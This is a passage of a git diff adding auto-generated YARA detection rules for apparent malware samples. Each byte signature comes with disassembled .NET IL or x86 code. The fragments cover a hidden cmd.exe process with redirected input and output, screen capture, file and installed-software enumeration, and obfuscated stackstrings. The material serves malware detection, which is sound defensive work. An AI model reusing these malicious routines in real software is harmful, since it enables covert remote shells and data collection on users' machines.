2A } + /* +function Reqss.Reqss::b__49 0x06000069@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - get common file path + 12C3 02 ldarg.0 + 12C4 1f 1a ldc.i4.s 0x1a + 12C6 28 5f 00 00 0a call System.Environment::GetFolderPath + 12CB 7d 9e 00 00 04 stfld _temp_dir1 + 12D0 2a ret + */ + $c11 = { 02 1F ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__18 0x0600003a@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - create directory + 0BC4 02 ldarg.0 + 0BC5 7b 9e 00 00 04 ldfld _temp_dir1 + 0BCA 28 54 00 00 0a call System.IO.Directory::CreateDirectory + 0BCF 26 pop + 0BD0 de 03 leave.s 0xbd5 + 0BD2 26 pop + 0BD3 de 00 leave.s 0xbd5 + 0BD5 2a ret + */ + $c12 = { 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A } + /* +function Reqss.Reqss::b__4b 0x0600006b@1c444ebeba24dcba8628b7dfe5fec7c6 with 2 features: + - check if directory exists + - create directory + 12EA 02 ldarg.0 + 12EB 7b 9e 00 00 04 ldfld _temp_dir1 + 12F0 28 61 00 00 0a call System.IO.Directory::Exists + 12F5 2d 0c brtrue.s 0x1303 + 12F7 02 ldarg.0 + 12F8 7b 9e 00 00 04 ldfld _temp_dir1 + 12FD 28 54 00 00 0a call System.IO.Directory::CreateDirectory + 1302 26 pop + 1303 2a ret + */ + $c13 = { 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2A } + /* +function Reqss.Reqss::b__13 0x06000035@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - delete directory + 0B0B 02 ldarg.0 + 0B0C 7b 9e 00 00 04 ldfld _temp_dir1 + 0B11 17 ldc.i4.1 + 0B12 28 53 00 00 0a call System.IO.Directory::Delete + 0B17 2a ret + */ + $c14 = { 02 7B ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__e 0x06000030@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - delete file + 0A5F 02 ldarg.0 + 0A60 7b 9e 00 00 04 ldfld _temp_dir1 + 0A65 28 51 00 00 0a call System.IO.File::Delete + 0A6A 2a ret + */ + $c15 = { 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 
2A } + /* +function Reqss.Reqss::b__8 0x0600002a@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - enumerate files on Windows + 0900 02 ldarg.0 + 0901 7b a0 00 00 04 ldfld dir1 + 0906 6f 4b 00 00 0a callvirt System.IO.DirectoryInfo::GetDirectories + 090B 0b stloc.1 + 090C 16 ldc.i4.0 + 090D 0c stloc.2 + 090E 2b 24 br.s 0x934 + 0910 07 ldloc.1 + 0911 08 ldloc.2 + 0912 9a ldelem.ref + 0913 0a stloc.0 + 0914 02 ldarg.0 + 0915 25 dup + 0916 7b a1 00 00 04 ldfld _res2 + 091B 06 ldloc.0 + 091C 6f 4c 00 00 0a callvirt System.IO.FileSystemInfo::get_Name + 0921 72 39 00 00 70 ldstr ":d:0|" + 0926 28 4d 00 00 0a call System.String::Concat + 092B 7d a1 00 00 04 stfld _res2 + 0930 08 ldloc.2 + 0931 17 ldc.i4.1 + 0932 58 add + 0933 0c stloc.2 + 0934 08 ldloc.2 + 0935 07 ldloc.1 + 0936 8e ldlen + 0937 69 conv.i4 + 0938 32 d6 blt.s 0x910 + 093A 2a ret + */ + $c16 = { 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 16 0C 2B ?? 07 08 9A 0A 02 25 7B ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 08 17 58 0C 08 07 8E 69 32 ?? 
2A } + /* +function Reqss.Reqss::b__9 0x0600002b@1c444ebeba24dcba8628b7dfe5fec7c6 with 2 features: + - enumerate files on Windows + - get file size + 0948 02 ldarg.0 + 0949 7b a0 00 00 04 ldfld dir1 + 094E 6f 4e 00 00 0a callvirt System.IO.DirectoryInfo::GetFiles + 0953 0b stloc.1 + 0954 16 ldc.i4.0 + 0955 0c stloc.2 + 0956 2b 54 br.s 0x9ac + 0958 07 ldloc.1 + 0959 08 ldloc.2 + 095A 9a ldelem.ref + 095B 0a stloc.0 + 095C 02 ldarg.0 + 095D 25 dup + 095E 7b a1 00 00 04 ldfld _res2 + 0963 0d stloc.3 + 0964 1b ldc.i4.5 + 0965 8d 01 00 00 01 newarr System.Object + 096A 13 04 stloc.s local(0x0004) + 096C 11 04 ldloc.s local(0x0004) + 096E 16 ldc.i4.0 + 096F 09 ldloc.3 + 0970 a2 stelem.ref + 0971 11 04 ldloc.s local(0x0004) + 0973 17 ldc.i4.1 + 0974 06 ldloc.0 + 0975 6f 4c 00 00 0a callvirt System.IO.FileSystemInfo::get_Name + 097A a2 stelem.ref + 097B 11 04 ldloc.s local(0x0004) + 097D 18 ldc.i4.2 + 097E 72 45 00 00 70 ldstr ":f:" + 0983 a2 stelem.ref + 0984 11 04 ldloc.s local(0x0004) + 0986 19 ldc.i4.3 + 0987 06 ldloc.0 + 0988 6f 4f 00 00 0a callvirt System.IO.FileInfo::get_Length + 098D 8c 31 00 00 01 box System.Int64 + 0992 a2 stelem.ref + 0993 11 04 ldloc.s local(0x0004) + 0995 1a ldc.i4.4 + 0996 72 23 00 00 70 ldstr "|" + 099B a2 stelem.ref + 099C 11 04 ldloc.s local(0x0004) + 099E 28 49 00 00 0a call System.String::Concat + 09A3 7d a1 00 00 04 stfld _res2 + 09A8 08 ldloc.2 + 09A9 17 ldc.i4.1 + 09AA 58 add + 09AB 0c stloc.2 + 09AC 08 ldloc.2 + 09AD 07 ldloc.1 + 09AE 8e ldlen + 09AF 69 conv.i4 + 09B0 32 a6 blt.s 0x958 + 09B2 2a ret + */ + $c17 = { 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 16 0C 2B ?? 07 08 9A 0A 02 25 7B ?? ?? ?? ?? 0D 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 09 A2 11 ?? 17 06 6F ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ?? 19 06 6F ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 08 17 58 0C 08 07 8E 69 32 ?? 
2A } + /* +function Shll.ShellEx::ctor 0x06000081@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - create a process with modified I/O handles and window + 21F0 14 ldnull + 21F1 0a stloc.0 + 21F2 14 ldnull + 21F3 0b stloc.1 + 21F4 14 ldnull + 21F5 0c stloc.2 + 21F6 02 ldarg.0 + 21F7 72 01 00 00 70 ldstr "" + 21FC 7d 83 00 00 04 stfld _lastLineOut + 2201 02 ldarg.0 + 2202 72 01 00 00 70 ldstr "" + 2207 7d 87 00 00 04 stfld _adm_token + 220C 02 ldarg.0 + 220D 28 0f 00 00 0a call System.Object::.ctor + 2212 02 ldarg.0 + 2213 17 ldc.i4.1 + 2214 7d 81 00 00 04 stfld __isRunning + 2219 02 ldarg.0 + 221A 73 58 00 00 0a newobj System.Diagnostics.Process::.ctor + 221F 7d 7d 00 00 04 stfld __ps + 2224 02 ldarg.0 + 2225 73 55 00 00 0a newobj System.Diagnostics.ProcessStartInfo::.ctor + 222A 7d 7e 00 00 04 stfld __psi + 222F 02 ldarg.0 + 2230 7b 7e 00 00 04 ldfld __psi + 2235 72 45 01 00 70 ldstr "C:\Windows\System32\cmd.exe" + 223A 6f 56 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_FileName + 223F 02 ldarg.0 + 2240 7b 7e 00 00 04 ldfld __psi + 2245 17 ldc.i4.1 + 2246 6f 6d 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_RedirectStandardInput + 224B 02 ldarg.0 + 224C 7b 7e 00 00 04 ldfld __psi + 2251 17 ldc.i4.1 + 2252 6f 6e 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput + 2257 02 ldarg.0 + 2258 7b 7e 00 00 04 ldfld __psi + 225D 17 ldc.i4.1 + 225E 6f 6f 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_RedirectStandardError + 2263 02 ldarg.0 + 2264 7b 7e 00 00 04 ldfld __psi + 2269 16 ldc.i4.0 + 226A 6f 70 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_UseShellExecute + 226F 02 ldarg.0 + 2270 7b 7e 00 00 04 ldfld __psi + 2275 17 ldc.i4.1 + 2276 6f 71 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_CreateNoWindow + 227B 02 ldarg.0 + 227C 7b 7e 00 00 04 ldfld __psi + 2281 72 4d 00 00 70 ldstr "C:\" + 2286 6f 57 00 00 0a callvirt 
System.Diagnostics.ProcessStartInfo::set_WorkingDirectory + 228B 02 ldarg.0 + 228C 7b 7d 00 00 04 ldfld __ps + 2291 02 ldarg.0 + 2292 7b 7e 00 00 04 ldfld __psi + 2297 6f 59 00 00 0a callvirt System.Diagnostics.Process::set_StartInfo + 229C 02 ldarg.0 + 229D 7b 7d 00 00 04 ldfld __ps + 22A2 6f 5a 00 00 0a callvirt System.Diagnostics.Process::Start + 22A7 26 pop + 22A8 02 ldarg.0 + 22A9 06 ldloc.0 + 22AA 2d 0d brtrue.s 0x22b9 + 22AC 02 ldarg.0 + 22AD fe 06 84 00 00 06 ldftn <.ctor>b__0 + 22B3 73 72 00 00 0a newobj System.Threading.ParameterizedThreadStart::.ctor + 22B8 0a stloc.0 + 22B9 06 ldloc.0 + 22BA 73 73 00 00 0a newobj System.Threading.Thread::.ctor + 22BF 7d 7f 00 00 04 stfld __t1 + 22C4 02 ldarg.0 + 22C5 7b 7f 00 00 04 ldfld __t1 + 22CA 02 ldarg.0 + 22CB 7b 7d 00 00 04 ldfld __ps + 22D0 6f 74 00 00 0a callvirt System.Threading.Thread::Start + 22D5 02 ldarg.0 + 22D6 07 ldloc.1 + 22D7 2d 0d brtrue.s 0x22e6 + 22D9 02 ldarg.0 + 22DA fe 06 85 00 00 06 ldftn <.ctor>b__1 + 22E0 73 72 00 00 0a newobj System.Threading.ParameterizedThreadStart::.ctor + 22E5 0b stloc.1 + 22E6 07 ldloc.1 + 22E7 73 73 00 00 0a newobj System.Threading.Thread::.ctor + 22EC 7d 80 00 00 04 stfld __t2 + 22F1 02 ldarg.0 + 22F2 7b 80 00 00 04 ldfld __t2 + 22F7 02 ldarg.0 + 22F8 7b 7d 00 00 04 ldfld __ps + 22FD 6f 74 00 00 0a callvirt System.Threading.Thread::Start + 2302 02 ldarg.0 + 2303 73 75 00 00 0a newobj System.Timers.Timer::.ctor + 2308 7d 84 00 00 04 stfld _timer + 230D 02 ldarg.0 + 230E 7b 84 00 00 04 ldfld _timer + 2313 23 00 00 00 00 00 40 59 40ldc.r8 101.0 + 231C 6f 76 00 00 0a callvirt System.Timers.Timer::set_Interval + 2321 02 ldarg.0 + 2322 7b 84 00 00 04 ldfld _timer + 2327 08 ldloc.2 + 2328 2d 0d brtrue.s 0x2337 + 232A 02 ldarg.0 + 232B fe 06 86 00 00 06 ldftn <.ctor>b__2 + 2331 73 77 00 00 0a newobj System.Timers.ElapsedEventHandler::.ctor + 2336 0c stloc.2 + 2337 08 ldloc.2 + 2338 6f 78 00 00 0a callvirt System.Timers.Timer::add_Elapsed + 233D 02 ldarg.0 + 233E 7b 84 00 00 
04 ldfld _timer + 2343 17 ldc.i4.1 + 2344 6f 79 00 00 0a callvirt System.Timers.Timer::set_Enabled + 2349 2a ret + */ + $c18 = { 14 0A 14 0B 14 0C 02 72 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 02 06 2D ?? 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 07 2D ?? 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 08 2D ?? 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__42 0x06000062@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - query or enumerate registry key + 112B 02 ldarg.0 + 112C 7e 5b 00 00 0a ldsfld Microsoft.Win32.Registry::LocalMachine + 1131 72 55 00 00 70 ldstr "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" + 1136 6f 5c 00 00 0a callvirt Microsoft.Win32.RegistryKey::OpenSubKey + 113B 7d a6 00 00 04 stfld _temp_key_ + 1140 2a ret + */ + $c19 = { 02 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 
2A } + /* +function Reqss.Reqss::b__43 0x06000063@1c444ebeba24dcba8628b7dfe5fec7c6 with 2 features: + - query or enumerate registry key + - query or enumerate registry value + 1150 02 ldarg.0 + 1151 7b a6 00 00 04 ldfld _temp_key_ + 1156 6f 5d 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetSubKeyNames + 115B 0c stloc.2 + 115C 16 ldc.i4.0 + 115D 0d stloc.3 + 115E 38 a5 00 00 00 br 0x1208 + 1163 08 ldloc.2 + 1164 09 ldloc.3 + 1165 9a ldelem.ref + 1166 0a stloc.0 + 1167 02 ldarg.0 + 1168 7b a6 00 00 04 ldfld _temp_key_ + 116D 06 ldloc.0 + 116E 6f 5c 00 00 0a callvirt Microsoft.Win32.RegistryKey::OpenSubKey + 1173 0b stloc.1 + 1174 02 ldarg.0 + 1175 25 dup + 1176 7b a1 00 00 04 ldfld _res2 + 117B 13 04 stloc.s local(0x0004) + 117D 1f 09 ldc.i4.s 0x9 + 117F 8d 01 00 00 01 newarr System.Object + 1184 13 05 stloc.s local(0x0005) + 1186 11 05 ldloc.s local(0x0005) + 1188 16 ldc.i4.0 + 1189 11 04 ldloc.s local(0x0004) + 118B a2 stelem.ref + 118C 11 05 ldloc.s local(0x0005) + 118E 17 ldc.i4.1 + 118F 07 ldloc.1 + 1190 72 bd 00 00 70 ldstr "DisplayName" + 1195 6f 5e 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetValue + 119A a2 stelem.ref + 119B 11 05 ldloc.s local(0x0005) + 119D 18 ldc.i4.2 + 119E 72 d5 00 00 70 ldstr "_;;;" + 11A3 a2 stelem.ref + 11A4 11 05 ldloc.s local(0x0005) + 11A6 19 ldc.i4.3 + 11A7 07 ldloc.1 + 11A8 72 df 00 00 70 ldstr "DisplayVersion" + 11AD 6f 5e 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetValue + 11B2 a2 stelem.ref + 11B3 11 05 ldloc.s local(0x0005) + 11B5 1a ldc.i4.4 + 11B6 72 d5 00 00 70 ldstr "_;;;" + 11BB a2 stelem.ref + 11BC 11 05 ldloc.s local(0x0005) + 11BE 1b ldc.i4.5 + 11BF 07 ldloc.1 + 11C0 72 fd 00 00 70 ldstr "InstallDate" + 11C5 6f 5e 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetValue + 11CA a2 stelem.ref + 11CB 11 05 ldloc.s local(0x0005) + 11CD 1c ldc.i4.6 + 11CE 72 d5 00 00 70 ldstr "_;;;" + 11D3 a2 stelem.ref + 11D4 11 05 ldloc.s local(0x0005) + 11D6 1d ldc.i4.7 + 11D7 07 ldloc.1 + 11D8 72 15 01 00 70 ldstr 
"Publisher" + 11DD 6f 5e 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetValue + 11E2 a2 stelem.ref + 11E3 11 05 ldloc.s local(0x0005) + 11E5 1e ldc.i4.8 + 11E6 72 29 01 00 70 ldstr "_|" + 11EB a2 stelem.ref + 11EC 11 05 ldloc.s local(0x0005) + 11EE 28 49 00 00 0a call System.String::Concat + 11F3 7d a1 00 00 04 stfld _res2 + 11F8 de 0a leave.s 0x1204 + 11FA 07 ldloc.1 + 11FB 2c 06 brfalse.s 0x1203 + 11FD 07 ldloc.1 + 11FE 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 1203 dc endfinally + 1204 09 ldloc.3 + 1205 17 ldc.i4.1 + 1206 58 add + 1207 0d stloc.3 + 1208 09 ldloc.3 + 1209 08 ldloc.2 + 120A 8e ldlen + 120B 69 conv.i4 + 120C 3f 52 ff ff ff blt 0x1163 + 1211 2a ret + */ + $c20 = { 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 16 0D 38 ?? ?? ?? ?? 08 09 9A 0A 02 7B ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 0B 02 25 7B ?? ?? ?? ?? 13 ?? 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 11 ?? A2 11 ?? 17 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ?? 19 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 1B 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 11 ?? 1C 72 ?? ?? ?? ?? A2 11 ?? 1D 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 11 ?? 1E 72 ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 09 17 58 0D 09 08 8E 69 3F ?? ?? ?? ?? 2A } + /* +function Screenss.ScreenCapture::CaptureScreen 0x06000072@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - unmanaged call + 1F5A 02 ldarg.0 + 1F5B 28 7c 00 00 06 call GetDesktopWindow + 1F60 28 73 00 00 06 call CaptureWindow + 1F65 2a ret + */ + $c21 = { 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A } + condition: + all of them +} + diff --git a/yara/expected_9324d1a8ae37a36ae560c37448c9705a.exe_.yar b/yara/expected_9324d1a8ae37a36ae560c37448c9705a.exe_.yar new file mode 100644 index 0000000..b636ef1 --- /dev/null +++ b/yara/expected_9324d1a8ae37a36ae560c37448c9705a.exe_.yar 
@@ -0,0 +1,7005 @@ +rule super_rule_9324d +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "9324d1a8ae37a36ae560c37448c9705a" + strings: + /* +Basic Block at 0x004031a0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x004031a0 + .text:0x004031a0 FUNC: int bfastcall_caller sub_004031a0( int eax, int edx, ) [2 XREFS] + .text:0x004031a0 + .text:0x004031a0 Stack Variables: (offset from initial top of stack) + .text:0x004031a0 -3: int local3 + .text:0x004031a0 -4: int local4 + .text:0x004031a0 -5: int local5 + .text:0x004031a0 -6: int local6 + .text:0x004031a0 -7: int local7 + .text:0x004031a0 -8: int local8 + .text:0x004031a0 -9: int local9 + .text:0x004031a0 -10: int local10 + .text:0x004031a0 -11: int local11 + .text:0x004031a0 -12: int local12 + .text:0x004031a0 -13: int local13 + .text:0x004031a0 -14: int local14 + .text:0x004031a0 -15: int local15 + .text:0x004031a0 -16: int local16 + .text:0x004031a0 + .text:0x004031a0 83ec10 sub esp,16 + .text:0x004031a3 b06c mov al,108 + .text:0x004031a5 8b1524a04000 mov edx,dword [0x0040a024] + .text:0x004031ab 88442401 mov byte [esp + 1],al + .text:0x004031af 88442402 mov byte [esp + 2],al + .text:0x004031b3 b06f mov al,111 + .text:0x004031b5 8d4c2400 lea ecx,dword [esp] + .text:0x004031b9 88442404 mov byte [esp + 4],al + .text:0x004031bd 8844240b mov byte [esp + 11],al + .text:0x004031c1 8b442414 mov eax,dword [esp + 20] + .text:0x004031c5 c644240044 mov byte [esp],68 + .text:0x004031ca 50 push eax + .text:0x004031cb 51 push ecx + .text:0x004031cc 52 push edx + .text:0x004031cd 6a00 push 0 + .text:0x004031cf c644241353 mov byte [esp + 19],83 + .text:0x004031d4 c644241572 mov byte [esp + 21],114 + .text:0x004031d9 c644241674 mov byte [esp + 22],116 + .text:0x004031de c644241757 mov byte [esp + 23],87 + .text:0x004031e3 c644241869 mov byte [esp + 24],105 + .text:0x004031e8 c64424196e mov byte [esp + 
25],110 + .text:0x004031ed c644241a64 mov byte [esp + 26],100 + .text:0x004031f2 c644241c77 mov byte [esp + 28],119 + .text:0x004031f7 c644241d00 mov byte [esp + 29],0 + .text:0x004031fc e8eff7ffff call 0x004029f0 ;sub_004029f0(0,str_Consys21.dll_0040a02c,local16,sp+4) + .text:0x00403201 a3c4a94000 mov dword [0x0040a9c4],eax + .text:0x00403206 33c0 xor eax,eax + .text:0x00403208 83c420 add esp,32 + .text:0x0040320b c20400 ret 4 + */ + $c0 = { 83 EC 10 B0 6C 8B 15 ?? ?? ?? ?? 88 44 24 ?? 88 44 24 ?? B0 6F 8D 4C 24 ?? 88 44 24 ?? 88 44 24 ?? 8B 44 24 ?? C6 44 24 ?? 44 50 51 52 6A 00 C6 44 24 ?? 53 C6 44 24 ?? 72 C6 44 24 ?? 74 C6 44 24 ?? 57 C6 44 24 ?? 69 C6 44 24 ?? 6E C6 44 24 ?? 64 C6 44 24 ?? 77 C6 44 24 ?? 00 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 33 C0 83 C4 20 C2 04 00 } + /* +Basic Block at 0x00403390@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x00403390 + .text:0x00403390 FUNC: int cdecl sub_00403390( int arg0, int arg1, int arg2, ) [4 XREFS] + .text:0x00403390 + .text:0x00403390 Stack Variables: (offset from initial top of stack) + .text:0x00403390 12: int arg2 + .text:0x00403390 8: int arg1 + .text:0x00403390 4: int arg0 + .text:0x00403390 -1023: int local1023 + .text:0x00403390 -1024: int local1024 + .text:0x00403390 -1028: int local1028 + .text:0x00403390 -1029: int local1029 + .text:0x00403390 -1030: int local1030 + .text:0x00403390 -1031: int local1031 + .text:0x00403390 -1032: int local1032 + .text:0x00403390 -1033: int local1033 + .text:0x00403390 -1034: int local1034 + .text:0x00403390 -1035: int local1035 + .text:0x00403390 -1036: int local1036 + .text:0x00403390 -1037: int local1037 + .text:0x00403390 -1038: int local1038 + .text:0x00403390 -1039: int local1039 + .text:0x00403390 -1040: int local1040 + .text:0x00403390 -1041: int local1041 + .text:0x00403390 -1042: int local1042 + .text:0x00403390 -1043: int local1043 + .text:0x00403390 -1044: int local1044 + .text:0x00403390 -1045: int local1045 + 
.text:0x00403390 -1046: int local1046 + .text:0x00403390 -1047: int local1047 + .text:0x00403390 -1048: int local1048 + .text:0x00403390 -1049: int local1049 + .text:0x00403390 -1050: int local1050 + .text:0x00403390 -1051: int local1051 + .text:0x00403390 -1052: int local1052 + .text:0x00403390 -1053: int local1053 + .text:0x00403390 -1054: int local1054 + .text:0x00403390 -1055: int local1055 + .text:0x00403390 -1056: int local1056 + .text:0x00403390 -1057: int local1057 + .text:0x00403390 -1058: int local1058 + .text:0x00403390 -1059: int local1059 + .text:0x00403390 -1060: int local1060 + .text:0x00403390 -1061: int local1061 + .text:0x00403390 -1062: int local1062 + .text:0x00403390 -1063: int local1063 + .text:0x00403390 -1064: int local1064 + .text:0x00403390 + .text:0x00403390 81ec28040000 sub esp,1064 + .text:0x00403396 56 push esi + .text:0x00403397 57 push edi + .text:0x00403398 b9ff000000 mov ecx,255 + .text:0x0040339d 33c0 xor eax,eax + .text:0x0040339f 8d7c2431 lea edi,dword [esp + 49] + .text:0x004033a3 c644243000 mov byte [esp + 48],0 + .text:0x004033a8 f3ab rep: stosd + .text:0x004033aa 8b3578904000 mov esi,dword [0x00409078] + .text:0x004033b0 6a00 push 0 + .text:0x004033b2 66ab stosd + .text:0x004033b4 aa stosb + .text:0x004033b5 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004033b7 b900010000 mov ecx,256 + .text:0x004033bc 33c0 xor eax,eax + .text:0x004033be 8d7c2430 lea edi,dword [esp + 48] + .text:0x004033c2 50 push eax + .text:0x004033c3 f3ab rep: stosd + .text:0x004033c5 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004033c7 b065 mov al,101 + .text:0x004033c9 b253 mov dl,83 + .text:0x004033cb 88442413 mov byte [esp + 19],al + .text:0x004033cf 8844241e mov byte [esp + 30],al + .text:0x004033d3 88442422 mov byte [esp + 34],al + .text:0x004033d7 88442427 mov byte [esp + 39],al + .text:0x004033db b172 mov cl,114 + .text:0x004033dd b073 mov al,115 + .text:0x004033df 6a00 push 0 + .text:0x004033e1 8854240c mov byte [esp + 12],dl + .text:0x004033e5 
c644240d59 mov byte [esp + 13],89 + .text:0x004033ea 8854240e mov byte [esp + 14],dl + .text:0x004033ee c644240f54 mov byte [esp + 15],84 + .text:0x004033f3 c644241045 mov byte [esp + 16],69 + .text:0x004033f8 c64424114d mov byte [esp + 17],77 + .text:0x004033fd c64424125c mov byte [esp + 18],92 + .text:0x00403402 c644241343 mov byte [esp + 19],67 + .text:0x00403407 c644241475 mov byte [esp + 20],117 + .text:0x0040340c 884c2415 mov byte [esp + 21],cl + .text:0x00403410 884c2416 mov byte [esp + 22],cl + .text:0x00403414 c64424186e mov byte [esp + 24],110 + .text:0x00403419 c644241974 mov byte [esp + 25],116 + .text:0x0040341e c644241a43 mov byte [esp + 26],67 + .text:0x00403423 c644241b6f mov byte [esp + 27],111 + .text:0x00403428 c644241c6e mov byte [esp + 28],110 + .text:0x0040342d c644241d74 mov byte [esp + 29],116 + .text:0x00403432 884c241e mov byte [esp + 30],cl + .text:0x00403436 c644241f6f mov byte [esp + 31],111 + .text:0x0040343b c64424206c mov byte [esp + 32],108 + .text:0x00403440 88542421 mov byte [esp + 33],dl + .text:0x00403444 c644242374 mov byte [esp + 35],116 + .text:0x00403449 c64424245c mov byte [esp + 36],92 + .text:0x0040344e 88542425 mov byte [esp + 37],dl + .text:0x00403452 884c2427 mov byte [esp + 39],cl + .text:0x00403456 c644242876 mov byte [esp + 40],118 + .text:0x0040345b c644242969 mov byte [esp + 41],105 + .text:0x00403460 c644242a63 mov byte [esp + 42],99 + .text:0x00403465 8844242c mov byte [esp + 44],al + .text:0x00403469 c644242d5c mov byte [esp + 45],92 + .text:0x0040346e c644242e25 mov byte [esp + 46],37 + .text:0x00403473 8844242f mov byte [esp + 47],al + .text:0x00403477 c644243000 mov byte [esp + 48],0 + .text:0x0040347c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040347e 8b842434040000 mov eax,dword [esp + 1076] + .text:0x00403485 8d4c2408 lea ecx,dword [esp + 8] + .text:0x00403489 50 push eax + .text:0x0040348a 8d542434 lea edx,dword [esp + 52] + .text:0x0040348e 51 push ecx + .text:0x0040348f 52 push edx + .text:0x00403490 
ff15d8914000 call dword [0x004091d8] ;user32.wsprintfA(local1024,local1064) + .text:0x00403496 83c40c add esp,12 + .text:0x00403499 6a00 push 0 + .text:0x0040349b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040349d 8bbc243c040000 mov edi,dword [esp + 1084] + .text:0x004034a4 6a00 push 0 + .text:0x004034a6 57 push edi + .text:0x004034a7 ff15c4904000 call dword [0x004090c4] ;kernel32.lstrlenA(arg2) + .text:0x004034ad 50 push eax + .text:0x004034ae 8b842440040000 mov eax,dword [esp + 1088] + .text:0x004034b5 57 push edi + .text:0x004034b6 6a01 push 1 + .text:0x004034b8 50 push eax + .text:0x004034b9 8d4c2444 lea ecx,dword [esp + 68] + .text:0x004034bd 51 push ecx + .text:0x004034be 6802000080 push 0x80000002 + .text:0x004034c3 e818170000 call 0x00404be0 ;sub_00404be0(0x80000002,local1024,arg1,1,arg2,kernel32.lstrlenA(arg2),0) + .text:0x004034c8 83c41c add esp,28 + .text:0x004034cb 6a00 push 0 + .text:0x004034cd ffd6 call esi ;kernel32.Sleep(0) + .text:0x004034cf 5f pop edi + .text:0x004034d0 5e pop esi + .text:0x004034d1 81c428040000 add 